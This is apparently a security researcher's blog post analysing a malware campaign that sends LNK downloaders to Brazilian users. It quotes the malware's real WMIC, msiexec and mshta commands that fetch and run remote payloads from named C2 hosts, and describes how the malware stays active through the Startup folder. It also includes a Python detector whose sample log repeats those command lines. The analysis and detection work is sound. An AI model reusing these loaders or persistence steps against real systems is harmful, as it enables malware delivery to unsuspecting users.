Monday, 28 May 2018

LNK files targeting Brazilian Users

Recently, I observed a lot of LNK files crafted to target users located in Brazil. The details of this campaign are not documented anywhere and the final stage payloads (binary files) are not even present on public sources such as VirusTotal.

Interestingly, there are numerous references in the source code to characters from World of Warcraft in the form of variable names. The most important reference being: SABNOCK.

This campaign has been active for the past few months; however, the operators frequently update it.

The original attack vector is an LNK based Downloader sent inside a ZIP archive.

On 25th of May 2018, I observed an LNK file which leveraged WMIC to download the malicious MSI file.

Name of the LNK file: v114googlexx4.lnk
MD5 hash of the LNK file: ac212f8d998343e77edfab76cbf3656e
MD5 hash of the ZIP file: dadc0ec5a5460e8c30859cc6fc3d9d7a

Target of the LNK file: C:\WINDOWS\system32\wbem\WMIC.exe process call create "msiexec.exe /i hxxp://Hrncmxbvh.laguerra.yourtrap.com:25014/v120?lguet90da /q"

On 27th of May 2018, I observed a new variant that changed the way the next-stage payloads are downloaded.

Name of the LNK file: suporte@grupoatarde.com.br.lnk
MD5 hash of the LNK file: e288ebcfcf2b5b10f774618de059d66b
MD5 hash of the ZIP file: 65f127944263a99c2834d8abf6d408ec

Target of the LNK file: C:\WINDOWS\system32\Wbem\WMIC.exe  os get /format:"hxxp://iusj666ru.charliepace.yourtrap.com:25071/v121?rbmzxmius"

This LNK file leverages WMIC to download an XSL file that contains a script. This is possible by passing the command-line parameter "/format".

Geo IP check

It is important to note that the C&C Servers in this case use a Geo IP mechanism to ensure that the correct response is given only if the request is coming from the intended targeted region. In this case, the Geo IP check ensures that the request is coming from Brazil.

As an example, if I try to connect to the above URL from a non-Brazilian IP address, the server returns a 404 Not Found response, as shown below:

Figure 1

I configured my TOR exit node to connect through Brazil. Now, when I attempt to connect to the above URL, it returns the correct response, as shown below:

Figure 2

XSL File Analysis

The main purpose of the XSL file in this case is to leverage mshta to download the malicious JavaScript file from the URL: http://vrx3152717.negan.sellclassics.com:25034/excx/?7475027111

    <![CDATA[
   
    var r = new ActiveXObject("WScript.Shell").Run('mshta.exe javascript:try{try{javascript:GetObject("script:ht"+"tp://vrx3152717.negan.sellclassics.com:25034/excx/?7475027111");self.close();}catch(e){}}catch(e){};self.close();');
    ]]>

SCT File Analysis

This is the main scriptlet file, which performs the following actions:

1. Downloads the next stage payloads from randomly chosen domains.
2. Configures the system for persistence.
3. Executes the next stage payloads.

Random Domain Selection

radador() is a function in this SCT file that generates a random number between the minimum and maximum values supplied to it as arguments.

pingadori is a random number generated in the range 1 to 52.

Each number corresponds to a domain name that will be used to fetch the next-stage payloads.

The complete list of domains is mentioned in the Appendix.

Downloading the Modules

The function Bxaki() takes two parameters:

URL -> The URL from which it needs to fetch the file.
File -> The path to which the file needs to be downloaded.

All the files will be downloaded to the directory: %userprofile%\tempwd

The download URLs are constructed as shown below:

xVRXastaroth2 = "ht"+"tp://vrx"+radador(1111111,9999999)+"."+xVRXastaroth+":"+radador(25010,25099)+"/"+ smaeVar;

1. It generates a random number in the range 1111111 to 9999999 and appends it to the string "http://vrx"; this is followed by "." and the randomly selected domain (xVRXastaroth).
2. It generates another random number in the range 25010 to 25099, which is used as the port number.

So, the download URLs have both static and dynamic parts. The random numbers are generated to hinder detection of the network traffic; however, since parts of the URL are still static, detection on that basis remains possible.
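As an added example (not the campaign's code and not the author's own tooling), the following Python detector keys on the static parts described in this section and in the two LNK targets above: WMIC "process call create" launching msiexec on a remote MSI, WMIC "/format:" with a remote XSL, mshta running GetObject("script:...") from the XSL stage, and the "http://vrx<7 digits>.<domain>:<25010-25099>/" URL shape with the known module names. The key=value log format, the indicator names and the random values filled into the sample lines are assumptions.

```python
import re
# Regexes built only from static parts of the artifacts on this page (hypothetical detector,
# not the campaign's own code). 1) WMIC "process call create" launching msiexec on a remote MSI.
WMIC_MSIEXEC_RE = re.compile(
    r'\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b.*\bmsiexec(?:\.exe)?\s+/i\s+"?https?://',
    re.IGNORECASE)
# 2) WMIC "os get /format:<url>" pulling a remote XSL that carries script.
WMIC_FORMAT_RE = re.compile(r'\bwmic(?:\.exe)?\b.*/format:"?https?://', re.IGNORECASE)
# 3) mshta running GetObject("script:...") to load the remote SCT from the XSL stage.
MSHTA_SCRIPT_RE = re.compile(r'\bmshta(?:\.exe)?\b.*GetObject\("script:', re.IGNORECASE)
# 4) Module URL: "http://vrx" + 7 random digits + "." + domain + ":" + port, port in 25010..25099.
VRX_URL_RE = re.compile(
    r'https?://vrx(?P<rand>\d{7})\.(?P<domain>[a-z0-9.-]+):(?P<port>\d{5})/(?P<path>[^\s"?]*)',
    re.IGNORECASE)
# Zip/php names the SCT requests, as summarised on the page.
KNOWN_MODULES = {"inixv121.zip", "SABNOCKXa.jpg.zip", "SABNOCKXb.jpg.zip", "SABNOCKXe.jpg.zip",
                 "SABNOCKXf.jpg.zip", "SABNOCKXg.gif.zip", "SABNOCKXdwwn.gif.zip", "gerarhv121.php"}

def classify(line):
    """Return the indicator names matched by one log line (empty list means clean)."""
    hits = []
    if WMIC_MSIEXEC_RE.search(line):
        hits.append("wmic_process_call_create_msiexec")
    if WMIC_FORMAT_RE.search(line):
        hits.append("wmic_format_remote_xsl")
    if MSHTA_SCRIPT_RE.search(line):
        hits.append("mshta_getobject_script")
    m = VRX_URL_RE.search(line)
    if m and 25010 <= int(m.group("port")) <= 25099:
        hits.append("vrx_random_subdomain_url")
        if m.group("path").rsplit("/", 1)[-1] in KNOWN_MODULES:
            hits.append("known_module_name")
    return hits

def scan(lines):
    """Map the index of each suspicious line to its indicators; clean lines are omitted."""
    return {i: classify(l) for i, l in enumerate(lines) if classify(l)}

# Constructed sample lines (hypothetical key=value EDR/proxy log). Hostnames and command
# lines are the page's, re-fanged; vrx random parts are filled in, path prefix (smaeVar) left empty.
SAMPLE_LOG = [
    'cmdline=C:\\WINDOWS\\system32\\wbem\\WMIC.exe process call create "msiexec.exe /i http://Hrncmxbvh.laguerra.yourtrap.com:25014/v120?lguet90da /q"',
    'cmdline=C:\\WINDOWS\\system32\\Wbem\\WMIC.exe  os get /format:"http://iusj666ru.charliepace.yourtrap.com:25071/v121?rbmzxmius"',
    'cmdline=mshta.exe javascript:try{GetObject("script:ht"+"tp://vrx3152717.negan.sellclassics.com:25034/excx/?7475027111");}catch(e){}',  # "ht"+"tp" split evades the URL regex; the mshta regex still fires
    'url=http://vrx5827341.negan.sellclassics.com:25055/SABNOCKXa.jpg.zip?48213 method=GET',
    'url=http://vrx1234567.negan.sellclassics.com:25200/index.html method=GET',  # port outside 25010..25099: not flagged
    'cmdline=C:\\WINDOWS\\system32\\wbem\\WMIC.exe os get caption',  # benign WMIC use: not flagged
]
```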

Below is a summary of the different files downloaded and the corresponding URLs:

sysvw.lnk - Downloaded from the URL: xVRXastaroth2 +"inixv121.zip?"+radador(0000001,999999999)
SABNOCKXa.jpg - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXa.jpg.zip?"+radador(0000001,999999999)
SABNOCKXb.jpg - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXb.jpg.zip?"+radador(0000001,999999999)
SABNOCKXe.jpg - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXe.jpg.zip?"+radador(0000001,999999999)
SABNOCKXf.jpg - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXf.jpg.zip?"+radador(0000001,999999999)
SABNOCKXg.gif - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXg.gif.zip?"+radador(0000001,999999999)
SABNOCKXdwwn.gif - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXdwwn.gif.zip?"+radador(0000001,999999999)
system64.exe - Downloaded from the URL: xVRXastaroth2 + "gerarhv121.php?"+radador(0000001,999999999)

system64.exe is the next stage payload which will be dropped and executed as shown below:

var xxWshShell = new ActiveXObject("WScript.Shell");
xxWshShell.run(sVarRaz+"\\system64.exe  /xy /"+radador(0000001,999999999),0,true);

This binary will be executed with the command line arguments: "/xy /<random_number>"

Persistence

The LNK file, sysvw.lnk is downloaded to the path: %userprofile%\tempwd\sysvw.lnk

This LNK file will be copied to the path %appdata%\microsoft\windows\start menu\programs\startup\ for persistence.

The target of the LNK file is: C:\WINDOWS\explorer.exe /e,/start,system64.exe

This ensures that every time the system starts, the system64.exe binary is executed.

In the follow up blog post, I will share the details of the payload.

c0d3inj3cT

Appendix

List of Domains used to fetch the next stage Payload

